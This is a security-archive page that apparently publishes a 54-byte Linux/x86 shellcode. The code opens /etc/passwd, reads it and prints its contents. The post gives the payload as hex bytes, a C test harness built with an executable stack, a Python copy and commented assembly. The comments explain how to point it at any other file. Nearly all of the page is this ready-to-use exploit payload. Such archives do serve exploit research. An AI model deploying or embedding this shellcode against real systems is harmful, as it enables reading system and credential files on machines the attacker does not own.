all things security

Linux/x86 File Reader Shellcode

Linux/x86 File Reader Shellcode
Posted Mar 20, 2017
Authored by WangYihang

54 bytes small Linux/x86 file reader shellcode.

tags | x86, shellcode
systems | linux
MD5 | a61cf38e4e4f0441e4507e470805edba

Linux/x86 File Reader Shellcode

Change Mirror Download
;================================================================================
; The MIT License
;
; Copyright (c) <year> <copyright holders>
;
; Permission is hereby granted, free of charge, to any person obtaining a copy
; of this software and associated documentation files (the "Software"), to deal
; in the Software without restriction, including without limitation the rights
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
; copies of the Software, and to permit persons to whom the Software is
; furnished to do so, subject to the following conditions:
;
; The above copyright notice and this permission notice shall be included in
; all copies or substantial portions of the Software.
;
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
; THE SOFTWARE.
;================================================================================
; Name : Linux/x86 - Anyfile Reader Shellcode (54 Bytes)
; Author : WangYihang
; Email : wangyihanger@gmail.com
; Tested on: Linux_x86
; Shellcode Length: 54
;================================================================================
; Shellcode :
; You can complie it to verify by using : gcc -z execstack -o exploit exploit.c
char shellcode[] = "\x31\xc9\x51\x68\x73\x73\x77\x64"
"\x68\x2f\x2f\x70\x61\x68\x2f\x65"
"\x74\x63\x89\xe3\x31\xc0\x99\xb0"
"\x05\xcd\x80\x89\xc7\xb2\xff\x89"
"\xe1\x89\xfb\xb0\x03\xcd\x80\xb3"
"\x01\xb0\x04\xcd\x80\xfe\xca\x80"
"\xfa\x01\x74\x02\xeb\xe9"
int main(){
void(*exploit)();
exploit = &shellcode;
exploit();
}
;================================================================================
; Python :
; shellcode = "\x31\xc9\x51\x68\x73\x73\x77\x64"
; shellcode += "\x68\x2f\x2f\x70\x61\x68\x2f\x65"
; shellcode += "\x74\x63\x89\xe3\x31\xc0\x99\xb0"
; shellcode += "\x05\xcd\x80\x89\xc7\xb2\xff\x89"
; shellcode += "\xe1\x89\xfb\xb0\x03\xcd\x80\xb3"
; shellcode += "\x01\xb0\x04\xcd\x80\xfe\xca\x80"
; shellcode += "\xfa\x01\x74\x02\xeb\xe9"
;================================================================================
; Assembly language code :
global _start
_start:
; int open(const char *pathname, int flags);
xor ecx, ecx ; #DEFINE O_RDONLY 0
; push \x00 to the stack to end the filename (string)
push ecx
; push filename to the stack (You can also change the filename to anyfile you want to read)
; But your input must in reverse order by 4 bytes.
; You can use '/' to file the 0 bytes , because execve() will ignore the muti '/' in your filepath
push "sswd"
push "//pa"
push "/etc"
mov ebx, esp
xor eax, eax
cdq
mov al, 05H
int 80H
mov edi, eax ; save the fd
mov dl, 1+0FEH
reading:
; ssize_t read(int fd, void *buf, size_t count);
;mov dl, 0FFH ; read 0xFF Bytes to the stack
mov ecx, esp
mov ebx, edi ; get the fd
mov al, 03H
int 80H
; ssize_t write(int fd, const void *buf, size_t count);
mov bl,1
mov al, 04H
int 80H
; continue reading ?
dec dl
cmp dl, 1H
jz exit ; jmp out
; continue reading!
jmp reading
exit:
; void _exit(int status);
; mov eax, 1
; int 80H
;================================================================================

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    8 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close